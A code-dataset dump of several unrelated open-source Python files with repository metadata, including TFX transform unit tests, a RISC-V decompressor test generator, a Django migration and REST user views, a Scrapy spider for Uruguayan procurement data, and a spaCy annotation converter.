] | 1 | 2021-06-09T07:05:23.000Z | 2021-06-09T07:05:23.000Z | brudnopis.py | Shandelier/python-movenet | f3eb866665f9e23ec313edf68df6302dd5786ed6 | [
"Apache-2.0"
] | null | null | null | brudnopis.py | Shandelier/python-movenet | f3eb866665f9e23ec313edf68df6302dd5786ed6 | [
"Apache-2.0"
] | null | null | null | # from sklearn.utils import shuffle
# import util as ut
# import os
# import pandas as pd
# import training_util as tut
# import numpy as np
# def sample_2000():
# file_paths, file_names, pose_type = ut.get_csvs_paths(
# os.path.join("5-people-csvs"))
# init = list.pop(file_paths)
# ds = pd.read_csv(init)
# for i, csv in enumerate(file_paths):
# read = pd.read_csv(csv)
# ds = pd.concat([ds, read], axis=0)
# # # ds.pop("filepath")
# # for p in tut.excessive_pred:
# # ds.pop(p)
# # for e in tut.excessive:
# # ds.pop(e)
# ds = ds.sample(2000)
# ds = shuffle(ds, random_state=420)
# ds = ds.reset_index(drop=True)
# print(ds.head())
# ds.to_csv(os.path.join(
# "results", "5_people_small.csv"), sep='\t', index=False, header=True)
# def negative():
# ds = pd.read_csv(os.path.join(
# "results", "5_people_small.csv"))
# pose = ds.pop("pose_type")
# file = ds.pop("filepath")
# negative = ds.loc[df.value]
# return 0
# sample_2000()
# import tensorflow as tf
# import tensorflow.keras.layers as layers
# import tensorflowjs as tfjs
# import os
# import train as t
# import util as ut
# import training_util as tut
# def main():
# model = tf.keras.Sequential([
# layers.Dense(22),
# layers.Dense(8, activation='relu'),
# layers.Dense(1, activation='sigmoid')
# ])
# model.compile(loss=tf.losses.MeanSquaredError(),
# optimizer=tf.optimizers.Adam())
# csvs, _, _ = ut.get_csvs_paths(r"./output")
# X, y, _ = t.load_split(csvs, 2, 2)
# model.fit(X, y, epochs=10)
# tfjs.converters.save_keras_model(model, tfjs_target_dir)
# main()
import numpy as np
# write = np.hstack([fname,
# pose, np.squeeze(keypoints_with_scores).flatten()]).reshape([1, 53])
arr = np.linspace(1, 51, 51).reshape([1, 1, 17, 3])
arr = np.squeeze(arr)
# arr = np.array([arr[:, col] for col in range(3)]).squeeze().flatten()
arr = arr.T.flatten()
print(arr)
| 23.724138 | 89 | 0.601744 |
3acef1e57e1e1cdd81c2829c115eefd77da35670 | 8,696 | py | Python | tfx/components/transform/executor_utils_test.py | avelez93/tfx | 75fbb6a7d50e99138609be3ca4c3a204a13a2195 | [
"Apache-2.0"
] | 1 | 2021-08-22T21:10:48.000Z | 2021-08-22T21:10:48.000Z | tfx/components/transform/executor_utils_test.py | avelez93/tfx | 75fbb6a7d50e99138609be3ca4c3a204a13a2195 | [
"Apache-2.0"
] | null | null | null | tfx/components/transform/executor_utils_test.py | avelez93/tfx | 75fbb6a7d50e99138609be3ca4c3a204a13a2195 | [
"Apache-2.0"
] | 1 | 2020-12-13T22:07:53.000Z | 2020-12-13T22:07:53.000Z | # Copyright 2021 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tfx.components.transform.executor_utils."""
import tensorflow as tf
from tfx.components.transform import executor_utils
from tfx.components.transform import labels
from tfx.proto import transform_pb2
from tfx.types import artifact_utils
from tfx.types import standard_artifacts
from tfx.types import standard_component_specs
from tfx.utils import proto_utils
class ExecutorUtilsTest(tf.test.TestCase):
def testMaybeBindCustomConfig(self):
def dummy(custom_config):
return custom_config
patched = executor_utils.MaybeBindCustomConfig(
{labels.CUSTOM_CONFIG: '{"value":42}'}, dummy)
self.assertEqual({'value': 42}, patched())
def testValidateOnlyOneSpecified(self):
executor_utils.ValidateOnlyOneSpecified({'a': 1}, ('a', 'b', 'c'))
with self.assertRaisesRegex(ValueError, 'One of'):
executor_utils.ValidateOnlyOneSpecified({'z': 1}, ('a', 'b', 'c'))
with self.assertRaisesRegex(ValueError, 'At most one of'):
executor_utils.ValidateOnlyOneSpecified({
'a': [1],
'b': '1'
}, ('a', 'b', 'c'))
def testValidateOnlyOneSpecifiedAllowMissing(self):
executor_utils.ValidateOnlyOneSpecified({'z': 1}, ('a', 'b', 'c'), True)
with self.assertRaisesRegex(ValueError, 'At most one of'):
executor_utils.ValidateOnlyOneSpecified({
'a': [1],
'b': '1'
}, ('a', 'b', 'c'), True)
def testMatchNumberOfTransformedExamplesArtifacts(self):
input_dict = {
standard_component_specs.EXAMPLES_KEY: [
standard_artifacts.Examples(),
standard_artifacts.Examples()
]
}
original_output_artifact = standard_artifacts.Examples()
original_output_artifact.uri = '/dummy/path'
output_dict = {
standard_component_specs.TRANSFORMED_EXAMPLES_KEY: [
original_output_artifact
]
}
executor_utils.MatchNumberOfTransformedExamplesArtifacts(
input_dict, output_dict)
self.assertLen(
output_dict[standard_component_specs.TRANSFORMED_EXAMPLES_KEY], 2)
# Uris of the new artifacts should be located under the original artifact.
self.assertTrue(output_dict[
standard_component_specs.TRANSFORMED_EXAMPLES_KEY][0].uri.startswith(
original_output_artifact.uri))
def testResolveSplitsConfigEmptyAnalyze(self):
wrong_config = transform_pb2.SplitsConfig(transform=['train'])
with self.assertRaisesRegex(ValueError, 'analyze cannot be empty'):
config_str = proto_utils.proto_to_json(wrong_config)
executor_utils.ResolveSplitsConfig(config_str, [])
def testResolveSplitsConfigOk(self):
config = transform_pb2.SplitsConfig(
analyze=['train'], transform=['train', 'eval'])
config_str = proto_utils.proto_to_json(config)
resolved = executor_utils.ResolveSplitsConfig(config_str, [])
self.assertProtoEquals(config, resolved)
def testResolveSplitsConfigInconsistentSplits(self):
examples1 = standard_artifacts.Examples()
examples1.split_names = artifact_utils.encode_split_names(['train'])
examples2 = standard_artifacts.Examples()
examples2.split_names = artifact_utils.encode_split_names(['train', 'test'])
with self.assertRaisesRegex(ValueError, 'same split names'):
executor_utils.ResolveSplitsConfig(None, [examples1, examples2])
def testResolveSplitsConfigDefault(self):
examples1 = standard_artifacts.Examples()
examples1.split_names = artifact_utils.encode_split_names(['train', 'test'])
examples2 = standard_artifacts.Examples()
examples2.split_names = artifact_utils.encode_split_names(['train', 'test'])
resolved = executor_utils.ResolveSplitsConfig(None, [examples1, examples2])
self.assertEqual(set(resolved.analyze), {'train'})
self.assertEqual(set(resolved.transform), {'train', 'test'})
def testSetSplitNames(self):
# Should work with None.
executor_utils.SetSplitNames(['train'], None)
examples1 = standard_artifacts.Examples()
examples2 = standard_artifacts.Examples()
executor_utils.SetSplitNames(['train'], [examples1, examples2])
self.assertEqual(examples1.split_names, '["train"]')
self.assertEqual(examples2.split_names, examples1.split_names)
def testGetSplitPaths(self):
# Should work with None.
self.assertEmpty(executor_utils.GetSplitPaths(None))
examples1 = standard_artifacts.Examples()
examples1.uri = '/uri1'
examples2 = standard_artifacts.Examples()
examples2.uri = '/uri2'
executor_utils.SetSplitNames(['train', 'test'], [examples1, examples2])
paths = executor_utils.GetSplitPaths([examples1, examples2])
self.assertCountEqual([
'/uri1/Split-train/transformed_examples',
'/uri2/Split-train/transformed_examples',
'/uri1/Split-test/transformed_examples',
'/uri2/Split-test/transformed_examples'
], paths)
def testGetCachePathEntry(self):
# Empty case.
self.assertEmpty(
executor_utils.GetCachePathEntry(
standard_component_specs.ANALYZER_CACHE_KEY, {}))
cache_artifact = standard_artifacts.TransformCache()
cache_artifact.uri = '/dummy'
# input
result = executor_utils.GetCachePathEntry(
standard_component_specs.ANALYZER_CACHE_KEY,
{standard_component_specs.ANALYZER_CACHE_KEY: [cache_artifact]})
self.assertEqual({labels.CACHE_INPUT_PATH_LABEL: '/dummy'}, result)
# output
result = executor_utils.GetCachePathEntry(
standard_component_specs.UPDATED_ANALYZER_CACHE_KEY,
{standard_component_specs.UPDATED_ANALYZER_CACHE_KEY: [cache_artifact]})
self.assertEqual({labels.CACHE_OUTPUT_PATH_LABEL: '/dummy'}, result)
def testGetStatusOutputPathsEntries(self):
# disabled.
self.assertEmpty(executor_utils.GetStatsOutputPathEntries(True, {}))
# enabled.
pre_transform_stats = standard_artifacts.ExampleStatistics()
pre_transform_stats.uri = '/pre_transform_stats'
pre_transform_schema = standard_artifacts.Schema()
pre_transform_schema.uri = '/pre_transform_schema'
post_transform_anomalies = standard_artifacts.ExampleAnomalies()
post_transform_anomalies.uri = '/post_transform_anomalies'
post_transform_stats = standard_artifacts.ExampleStatistics()
post_transform_stats.uri = '/post_transform_stats'
post_transform_schema = standard_artifacts.Schema()
post_transform_schema.uri = '/post_transform_schema'
result = executor_utils.GetStatsOutputPathEntries(
False, {
standard_component_specs.PRE_TRANSFORM_STATS_KEY:
[pre_transform_stats],
standard_component_specs.PRE_TRANSFORM_SCHEMA_KEY:
[pre_transform_schema],
standard_component_specs.POST_TRANSFORM_ANOMALIES_KEY:
[post_transform_anomalies],
standard_component_specs.POST_TRANSFORM_STATS_KEY:
[post_transform_stats],
standard_component_specs.POST_TRANSFORM_SCHEMA_KEY:
[post_transform_schema],
})
self.assertEqual(
{
labels.PRE_TRANSFORM_OUTPUT_STATS_PATH_LABEL:
'/pre_transform_stats',
labels.PRE_TRANSFORM_OUTPUT_SCHEMA_PATH_LABEL:
'/pre_transform_schema',
labels.POST_TRANSFORM_OUTPUT_ANOMALIES_PATH_LABEL:
'/post_transform_anomalies',
labels.POST_TRANSFORM_OUTPUT_STATS_PATH_LABEL:
'/post_transform_stats',
labels.POST_TRANSFORM_OUTPUT_SCHEMA_PATH_LABEL:
'/post_transform_schema',
}, result)
def testGetStatusOutputPathsEntriesMissingArtifact(self):
pre_transform_stats = standard_artifacts.ExampleStatistics()
pre_transform_stats.uri = '/pre_transform_stats'
with self.assertRaisesRegex(
ValueError, 'all stats_output_paths should be specified or none'):
executor_utils.GetStatsOutputPathEntries(False, {
standard_component_specs.PRE_TRANSFORM_STATS_KEY:
[pre_transform_stats]
})
if __name__ == '__main__':
tf.test.main()
| 39.889908 | 80 | 0.722516 |
3ad380b2ffcde7df6679cbb1d4378e9417a3ee46 | 5,675 | py | Python | modules/decompressor/uatg_decompressor_floating_01.py | incoresemi/chromite_uatg_tests | ff3116407c16eef0e73a1f3527075efdb2a4eb14 | [
"BSD-3-Clause"
] | 3 | 2021-09-17T04:53:08.000Z | 2021-09-17T06:14:23.000Z | modules/decompressor/uatg_decompressor_floating_01.py | incoresemi/chromite_uatg_tests | ff3116407c16eef0e73a1f3527075efdb2a4eb14 | [
"BSD-3-Clause"
] | 3 | 2022-01-04T06:52:50.000Z | 2022-02-09T13:25:29.000Z | modules/decompressor/uatg_decompressor_floating_01.py | incoresemi/chromite_uatg_tests | ff3116407c16eef0e73a1f3527075efdb2a4eb14 | [
"BSD-3-Clause"
] | 2 | 2022-01-04T04:36:40.000Z | 2022-01-04T05:32:24.000Z | # python program to generate an assembly file which checks if mis-predictions
# occur In addition to this, the GHR is also filled with ones (additional
# test case) uses assembly macros
from typing import Dict, List, Union, Any
# To-Do -> Create another function which prints the includes and other
# assembler directives complying to the test format spec
from yapsy.IPlugin import IPlugin
from uatg.utils import paging_modes
class uatg_decompressor_floating_01(IPlugin):
def __init__(self):
super().__init__()
self.isa = "RV64I"
self.split_isa = "RV64I"
self.modes = []
def execute(self, core_yaml, isa_yaml):
self.isa = isa_yaml['hart0']['ISA']
# we split the ISA based on Z because, we are checking for
# 'C' and 'F' standard extensions. When Zifencei or Zicsr are
# enabled, the test using 'in' keyword will not return the expected
# result.
self.split_isa = self.isa.split('Z')
self.modes = ['machine']
if 'S' in self.isa:
self.modes.append('supervisor')
if 'U' in self.isa:
self.modes.append('user')
if 'RV32' in self.isa:
isa_string = 'rv32'
else:
isa_string = 'rv64'
try:
if isa_yaml['hart0']['satp'][f'{isa_string}']['accessible']:
mode = isa_yaml['hart0']['satp'][f'{isa_string}']['mode'][
'type']['warl']['legal']
self.satp_mode = mode[0]
except KeyError:
pass
self.paging_modes = paging_modes(self.satp_mode, self.isa)
if 'C' and 'F' in self.split_isa[0]:
return True
else:
return False
def generate_asm(self) -> List[Dict[str, Union[Union[str, list], Any]]]:
"""This function will return all the compressed instructions"""
for mode in self.modes:
machine_exit_count = 0
for paging_mode in self.paging_modes:
if mode == 'machine':
if machine_exit_count > 0:
continue
machine_exit_count = machine_exit_count + 1
asm = f"#define RVTEST_FP_ENABLE()\n" \
f"\tLI x2, MSTATUS_FS;\n" \
f"\tcsrrs x3, mstatus,x0;\n" \
f"\tor x2, x3, x2;\n" \
f"\tcsrrw x0,mstatus,x2;\n" \
f"\n\n\t## test: floating ##\n\n" \
f"\t###Integer Constant-Generation Instructions###\n" \
f"\t###Floating Point and Stack Pointer Based Load and " \
f"Store####\n\n\tLA (x2,sample_data)\n" \
f"\tc.fsdsp f8,8(x2)\n" \
f"\tc.fldsp f12,8(x2)\n" \
f"\t###Floating Point Load and Store####\n" \
f"\tLA (x10,sample_data)\n" \
f"\tc.fsd f11,8(x10)\n" \
f"\tLA (x12,sample_data)\n" \
f"\tc.fld f9,8(x12)\n" \
# compile macros for the test
if mode != 'machine':
compile_macros = ['rvtest_mtrap_routine', 's_u_mode_test']
else:
compile_macros = []
# trap signature bytes
trap_sigbytes = 24
# initialize the signature region
sig_code = 'mtrap_count:\n .fill 1, 8, 0x0\n' \
'mtrap_sigptr:\n' \
f' .fill {trap_sigbytes // 4},4,0xdeadbeef\n'
asm_data = f'\n.align 3\n\n'\
f'exit_to_s_mode:\n.dword\t0x1\n\n'\
f'sample_data:\n.word\t0xbabecafe\n'\
f'.word\t0xdeadbeef\n\n'\
f'.align 3\n\nsatp_mode_val:\n.dword\t0x0\n\n'
# user can choose to generate supervisor and/or user tests in
# addition to machine mode tests here.
privileged_test_enable = False
if not privileged_test_enable:
self.modes.remove('supervisor')
self.modes.remove('user')
privileged_test_dict = {
'enable': privileged_test_enable,
'mode': mode,
'page_size': 4096,
'paging_mode': paging_mode,
'll_pages': 64,
}
yield ({
'asm_code': asm,
'asm_sig': asm_sig,
'compile_macros': compile_macros,
'privileged_test': privileged_test_dict,
'docstring': 'This test fills ghr register with ones',
'name_postfix': f"{mode}-" + ('' if mode == 'machine' else paging_mode)
})
def generate_covergroups(self, config_file):
"""
returns the covergroups for this test
"""
config = config_file
fn_decompress_inst = config['decompressor']['input'][
'decompressor_input']
sv = f"""covergroup floating_point_cg @(posedge CLK);\n
option.per_instance=1;
///coverpoint for floating point instructions
floating_point_cp : coverpoint {fn_decompress_inst}"""
sv += "{\n"
sv += """ wildcard bins C_FLDSP = {16'b001_x_xxxxx_xxxxx_10};\n
wildcard bins C_FSDSP = {16'b101_xxxxxx_xxxxx_10};\n
wildcard bins C_FLD = {16'b001_xxx_xxx_xx_xxx_00};\n
wildcard bins C_FSD = {16'b101_xxx_xxx_xx_xxx_00};\n
}
endgroup\n"""
return sv
| 37.091503 | 91 | 0.514185 |
3ad446c1b07e34f2fa0ee1ef1453cf07206ea6ad | 975 | py | Python | backend/account_request/migrations/0002_auto_20190214_2145.py | adabutch/account_tracker | 2ae6e287266262557268f080cff821a736d6ec8b | [
"MIT"
] | null | null | null | backend/account_request/migrations/0002_auto_20190214_2145.py | adabutch/account_tracker | 2ae6e287266262557268f080cff821a736d6ec8b | [
"MIT"
] | 2 | 2020-02-11T15:45:51.000Z | 2020-07-17T16:47:06.000Z | backend/account_request/migrations/0002_auto_20190214_2145.py | adabutch/account_tracker | 2ae6e287266262557268f080cff821a736d6ec8b | [
"MIT"
] | null | null | null | # Generated by Django 2.1.5 on 2019-02-14 21:45
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('account_request', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='accountrequest',
name='division',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AlterField(
model_name='accountrequest',
name='facility',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AlterField(
model_name='accountrequest',
name='middle_name',
field=models.CharField(blank=True, max_length=50, null=True),
),
migrations.AlterField(
model_name='accountrequest',
name='suffix',
field=models.CharField(blank=True, max_length=10, null=True),
),
]
| 28.676471 | 73 | 0.585641 |
3ad6ff269fcd4396a9cf1a6ea13465342af4b41c | 2,017 | py | Python | kingfisher_scrapy/spiders/uruguay_historical.py | open-contracting/kingfisher-collect | 2fbbd6361a0ec959e0603343a4b363f97fae3815 | [
"BSD-3-Clause"
] | 7 | 2020-07-24T13:15:37.000Z | 2021-12-11T22:40:07.000Z | kingfisher_scrapy/spiders/uruguay_historical.py | open-contracting/kingfisher-collect | 2fbbd6361a0ec959e0603343a4b363f97fae3815 | [
"BSD-3-Clause"
] | 418 | 2020-04-27T22:15:27.000Z | 2022-03-31T23:49:34.000Z | kingfisher_scrapy/spiders/uruguay_historical.py | open-contracting/kingfisher-collect | 2fbbd6361a0ec959e0603343a4b363f97fae3815 | [
"BSD-3-Clause"
] | 6 | 2020-05-28T16:06:53.000Z | 2021-03-16T02:54:15.000Z | import datetime
import scrapy
from kingfisher_scrapy.base_spider import CompressedFileSpider
from kingfisher_scrapy.util import components, handle_http_error
class UruguayHistorical(CompressedFileSpider):
"""
Domain
Agencia Reguladora de Compras Estatales (ARCE)
Spider arguments
from_date
Download only data from this year onward (YYYY format).
If ``until_date`` is provided, defaults to '2002'.
until_date
Download only data until this year (YYYY format).
If ``from_date`` is provided, defaults to the current year.
Bulk download documentation
https://www.gub.uy/agencia-compras-contrataciones-estado/datos-y-estadisticas/datos/open-contracting
"""
name = 'uruguay_historical'
download_timeout = 1000
# BaseSpider
date_format = 'year'
default_from_date = '2002'
skip_pluck = 'Already covered (see code for details)' # uruguay_releases
# SimpleSpider
data_type = 'release_package'
def start_requests(self):
# A CKAN API JSON response.
url = 'https://catalogodatos.gub.uy/api/3/action/package_show?id=arce-datos-historicos-de-compras'
yield scrapy.Request(url, meta={'file_name': 'list.json'}, callback=self.parse_list)
@handle_http_error
def parse_list(self, response):
data = response.json()
for resource in data['result']['resources']:
if resource['format'].upper() == 'JSON':
url = resource['url']
if self.from_date and self.until_date:
# URL looks like
# https://catalogodatos.gub.uy/dataset/44d3-b09c/resource/1e39-453d/download/ocds-2002.zip
url_year = int(url.split('-')[-1].split('.')[0])
url_date = datetime.datetime(url_year, 1, 1)
if not (self.from_date <= url_date <= self.until_date):
continue
yield self.build_request(url, formatter=components(-1))
| 38.056604 | 110 | 0.644522 |
3ad6ff65fc6e55b853f7c971880fa3dab4b97d0c | 1,136 | py | Python | toSpcy/toSpacy.py | patrick013/toSpcy | 8c10bc01e4a549dc177e1efb18c9c87a4dbd6f4c | [
"Apache-2.0"
] | 3 | 2019-11-07T17:29:57.000Z | 2022-03-21T01:45:04.000Z | toSpcy/toSpacy.py | patrick013/toSpcy | 8c10bc01e4a549dc177e1efb18c9c87a4dbd6f4c | [
"Apache-2.0"
] | null | null | null | toSpcy/toSpacy.py | patrick013/toSpcy | 8c10bc01e4a549dc177e1efb18c9c87a4dbd6f4c | [
"Apache-2.0"
] | null | null | null | import re
class Convertor():
def __init__(self, tagslabels={}):
self._tagslabels = tagslabels
def _handleLabel(self, tag):
if tag in self._tagslabels.keys():
return self._tagslabels[tag]
return tag
def _handleSingle(self, t):
entities = []
index = 0
t = re.sub(r'\s+', ' ', t)
tList = re.split('(<[a-zA-Z]+>[^<]+</[a-zA-Z]+>)', t)
if len(tList) % 2 == 0:
print("Error! Some labels might be missed! ")
return
pattern = re.compile("<[a-zA-Z]+>[^<]+</[a-zA-Z]+>")
for ele in tList:
if pattern.match(ele):
len_notag = len(''.join(re.split('</?[a-zA-Z]+>', ele)))
entities.append((index, index + len_notag,
self._handleLabel(re.split('.+</|>', ele)[1])))
index += len_notag
else:
index += len(ele)
return (''.join(re.split('</?[a-zA-Z]+>', t)), {'entities': entities})
def toSpacyFormat(self, tagged_data):
return [self._handleSingle(data) for data in tagged_data]
| 31.555556 | 80 | 0.491197 |
3ad7245b008d3289d24d032c2d3cd8b153b127c9 | 634 | py | Python | main.py | iarwain8a/pydlbot | 3d471795da3f5f17f2e784a9fa508f9dd5613bd3 | [
"MIT"
] | null | null | null | main.py | iarwain8a/pydlbot | 3d471795da3f5f17f2e784a9fa508f9dd5613bd3 | [
"MIT"
] | null | null | null | main.py | iarwain8a/pydlbot | 3d471795da3f5f17f2e784a9fa508f9dd5613bd3 | [
"MIT"
] | null | null | null | import pydlbot_ui as Ui
import sys
from PyQt5 import QtGui, QtCore, QtWidgets
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
import time
import threading
if __name__ == '__main__':
p = threading.Thread(target=main)
p.start()
for i in range(3):
t = threading.Thread(target=f,args=(i,))
t.start()
def main():
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui.Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
def f(id):
print ("thread function",id)
return
| 22.642857 | 56 | 0.656151 |
3ad734bd68154710d060d7aea6f8d2354fbd9080 | 6,832 | py | Python | src/view/deprecated/files.py | fred-yu-2013/Elastos.Hive.Node | 1dcc9178c12efefc786bc653bacec50a1f79161b | [
"MIT"
] | 5 | 2020-11-18T09:14:24.000Z | 2021-08-17T13:55:49.000Z | src/view/deprecated/files.py | fred-yu-2013/Elastos.Hive.Node | 1dcc9178c12efefc786bc653bacec50a1f79161b | [
"MIT"
] | 45 | 2020-11-09T03:40:53.000Z | 2021-11-02T08:43:49.000Z | src/view/deprecated/files.py | fred-yu-2013/Elastos.Hive.Node | 1dcc9178c12efefc786bc653bacec50a1f79161b | [
"MIT"
] | 5 | 2021-01-25T16:25:59.000Z | 2021-09-23T20:18:12.000Z | # -*- coding: utf-8 -*-
"""
The view of files module.
"""
from flask import Blueprint, request
from src.modules.files.files import Files
from src.utils.http_exception import BadRequestException
blueprint = Blueprint('files-deprecated', __name__)
files: Files = None
def init_app(app):
""" This will be called by application initializer. """
global files
files = Files()
app.register_blueprint(blueprint)
@blueprint.route('/api/v2/vault/files-deprecated/<regex("(|[0-9a-zA-Z_/.]*)"):path>', methods=['GET'])
def reading_operation(path):
""" Download/get the properties of/get the hash of the file, list the files of the folder.
Download the content of the file by path if no URL parameter.
.. :quickref: 04 Files; Download/properties/hash/list
**Request**:
.. sourcecode:: http
None
**Response OK**:
.. sourcecode:: http
HTTP/1.1 200 OK
.. code-block:: json
<The bytes of the content of the file.>
**Response Error**:
.. sourcecode:: http
HTTP/1.1 400 Bad Request
.. sourcecode:: http
HTTP/1.1 401 Unauthorized
.. sourcecode:: http
HTTP/1.1 403 Forbidden
.. sourcecode:: http
HTTP/1.1 404 Not Found
List the files of the directory by the path if the URL parameter is 'comp=children'.
**Request**:
.. sourcecode:: http
None
**Response OK**:
.. sourcecode:: http
HTTP/1.1 200 OK
.. code-block:: json
{
“value”: [{
“name”: “<path/to/res>”
“is_file”: false,
“size”: <Integer>
}, {
“name”: “<path/to/dir>”
“is_file”: true
}]
}
**Response Error**:
.. sourcecode:: http
HTTP/1.1 400 Bad Request
.. sourcecode:: http
HTTP/1.1 401 Unauthorized
.. sourcecode:: http
HTTP/1.1 403 Forbidden
.. sourcecode:: http
HTTP/1.1 404 Not Found
Get the properties of the file by the path if the URL parameter is 'comp=metadata'.
**Request**:
.. sourcecode:: http
None
**Response OK**:
.. sourcecode:: http
HTTP/1.1 200 OK
.. code-block:: json
{
“name”: <path/to/res>,
“is_file”: <true: file, false: folder>,
“size”: <size>,
“created”: <created timestamp>
“updated”: <updated timestamp>
}
**Response Error**:
.. sourcecode:: http
HTTP/1.1 400 Bad Request
.. sourcecode:: http
HTTP/1.1 401 Unauthorized
.. sourcecode:: http
HTTP/1.1 403 Forbidden
.. sourcecode:: http
HTTP/1.1 404 Not Found
Get the hash of the file by the path if the URL parameter is 'comp=hash'.
**Request**:
.. sourcecode:: http
None
**Response OK**:
.. sourcecode:: http
HTTP/1.1 200 OK
.. code-block:: json
{
"name": <the path of the file>
“algorithm”: <“algorithm name: currently support SHA256”>
"hash": <SHA-256 computation value of the file content>
}
**Response Error**:
.. sourcecode:: http
HTTP/1.1 400 Bad Request
.. sourcecode:: http
HTTP/1.1 401 Unauthorized
.. sourcecode:: http
HTTP/1.1 403 Forbidden
.. sourcecode:: http
HTTP/1.1 404 Not Found
"""
component = request.args.get('comp')
if not component:
return files.download_file(path)
elif component == 'children':
return files.list_folder(path)
elif component == 'metadata':
return files.get_properties(path)
elif component == 'hash':
return files.get_hash(path)
else:
return BadRequestException(msg='invalid parameter "comp"').get_error_response()
@blueprint.route('/api/v2/vault/files-deprecated/<path:path>', methods=['PUT'])
def writing_operation(path):
""" Copy or upload file by path.
Copy the file by the path if the URL parameter is 'dest=<path/to/destination>'.
.. :quickref: 04 Files; Copy/upload
**Request**:
.. sourcecode:: http
None
**Response OK**:
.. sourcecode:: http
HTTP/1.1 201 Created
.. code-block:: json
{
“name”: “<path/to/destination>”
}
**Response Error**:
.. sourcecode:: http
HTTP/1.1 400 Bad Request
.. sourcecode:: http
HTTP/1.1 401 Unauthorized
.. sourcecode:: http
HTTP/1.1 403 Forbidden
.. sourcecode:: http
HTTP/1.1 404 Not Found
.. sourcecode:: http
HTTP/1.1 455 Already Exists
Upload the content of the file by path if no URL parameter.
**Request**:
.. sourcecode:: http
None
**Response OK**:
.. sourcecode:: http
HTTP/1.1 201 Created
.. code-block:: json
{
“name”: “<path/to/res>”
}
**Response Error**:
.. sourcecode:: http
HTTP/1.1 400 Bad Request
.. sourcecode:: http
HTTP/1.1 401 Unauthorized
.. sourcecode:: http
HTTP/1.1 403 Forbidden
.. sourcecode:: http
HTTP/1.1 404 Not Found
"""
dest_path = request.args.get('dest')
if dest_path:
return files.copy_file(path, dest_path)
return files.upload_file(path)
@blueprint.route('/api/v2/vault/files-deprecated/<path:path>', methods=['PATCH'])
def move_file(path):
""" Move the file by path to the file provided by the URL parameter 'to=<path/to/destination>'
.. :quickref: 04 Files; Move
**Request**:
.. sourcecode:: http
None
**Response OK**:
.. sourcecode:: http
HTTP/1.1 200 OK
.. code-block:: json
{
“name”: “<path/to/destination>”
}
**Response Error**:
.. sourcecode:: http
HTTP/1.1 400 Bad Request
.. sourcecode:: http
HTTP/1.1 401 Unauthorized
.. sourcecode:: http
HTTP/1.1 403 Forbidden
.. sourcecode:: http
HTTP/1.1 404 Not Found
.. sourcecode:: http
HTTP/1.1 455 Already Exists
"""
dst_path = request.args.get('to')
return files.move_file(path, dst_path)
@blueprint.route('/api/v2/vault/files-deprecated/<path:path>', methods=['DELETE'])
def delete_file(path):
""" Delete the file by path.
.. :quickref: 04 Files; Delete
**Request**:
.. sourcecode:: http
None
**Response OK**:
.. sourcecode:: http
HTTP/1.1 204 No Content
**Response Error**:
.. sourcecode:: http
HTTP/1.1 400 Bad Request
.. sourcecode:: http
HTTP/1.1 401 Unauthorized
.. sourcecode:: http
HTTP/1.1 403 Forbidden
"""
return files.delete_file(path)
| 17.884817 | 102 | 0.562207 |
3ad8fecb1b29ee0733883fd90b75697788d9e406 | 2,109 | py | Python | backend_final/apartacho/users/views.py | cenavia/skylynx | 6286294a8cd57279e3c176d8fcae656cef4b40a8 | [
"MIT"
] | 3 | 2020-04-29T18:07:40.000Z | 2020-05-20T20:52:52.000Z | backend_final/apartacho/users/views.py | cenavia/Apartacho | 6286294a8cd57279e3c176d8fcae656cef4b40a8 | [
"MIT"
] | 53 | 2020-05-13T03:27:41.000Z | 2022-03-12T00:32:46.000Z | backend_final/apartacho/users/views.py | cenavia/Apartacho | 6286294a8cd57279e3c176d8fcae656cef4b40a8 | [
"MIT"
] | 2 | 2020-05-16T05:34:45.000Z | 2020-06-11T14:47:50.000Z | """Users views."""
# Django REST Framework
from rest_framework.viewsets import GenericViewSet
from rest_framework.mixins import (ListModelMixin,
RetrieveModelMixin,
UpdateModelMixin)
from rest_framework import status
from rest_framework.decorators import action
from rest_framework.response import Response
# Serializers
from apartacho.users.serializers import (
AccountVerificationSerializer,
UserLoginSerializer,
UserModelSerializer,
UserSignUpSerializer
)
# Models
from apartacho.users.models import User
class UserViewSet(ListModelMixin,
RetrieveModelMixin,
UpdateModelMixin,
GenericViewSet):
"""User view set.
Handle sign up, login and account verification.
"""
queryset = User.objects.filter(is_active=True)
serializer_class = UserModelSerializer
lookup_field = 'email'
@action(detail=False, methods=['post'])
def login(self, request):
"""User sign in."""
serializer = UserLoginSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
user, token = serializer.save()
data = {
'user': UserModelSerializer(user).data,
'access_token': token
}
return Response(data, status=status.HTTP_200_OK)
@action(detail=False, methods=['post'])
def signup(self, request):
"""User sign up."""
serializer = UserSignUpSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
user = serializer.save()
data = UserModelSerializer(user).data
return Response(data, status=status.HTTP_201_CREATED)
@action(detail=False, methods=['post'])
def verify(self, request):
"""Account verification."""
serializer = AccountVerificationSerializer(data=request.data)
serializer.is_valid(raise_exception=True)
serializer.save()
data = {'message': 'Congratulation, now go find to dream!'}
return Response(data, status=status.HTTP_200_OK)
| 31.954545 | 69 | 0.662399 |
3ad9ef77b1856ec357338eec91418078b9e1ee31 | 1,069 | py | Python | examples/cpp/simplicial_complex.py | TripleEss/TDALayer | 25a2da5eab50fad2d006167c2d1c97ec5efb53e0 | [
"MIT"
] | null | null | null | examples/cpp/simplicial_complex.py | TripleEss/TDALayer | 25a2da5eab50fad2d006167c2d1c97ec5efb53e0 | [
"MIT"
] | null | null | null | examples/cpp/simplicial_complex.py | TripleEss/TDALayer | 25a2da5eab50fad2d006167c2d1c97ec5efb53e0 | [
"MIT"
